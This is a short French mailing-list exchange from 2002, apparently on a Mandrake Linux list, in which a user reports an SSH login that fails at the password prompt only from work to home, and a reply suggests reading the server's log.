Pour avancer un peu, quelles sont les infos dans le log sur la machine chez moi C'est souvent plus parlant que le retour d'erreur de la ligne de commande. donne nous un digest de ton log ou étudie le bien en détail est la solution risque de venir d'elle même. Fabien - Original Message - From: Emmanuel Penove [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Monday, January 14, 2002 11:20 PM Subject: [Confirme] Pb connecxion SSH VOilà un pb irrésolvable . j'éspère pas ... g un pb de connexion : juste à la demande de mot de passe : de chez moi o taf : ok de chez moi chez un ami : ok du taf à chez moi : PAS BON du taf chez mon pote : ok de l'ami chez mmoi : ok de l'ami o taf : ok Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;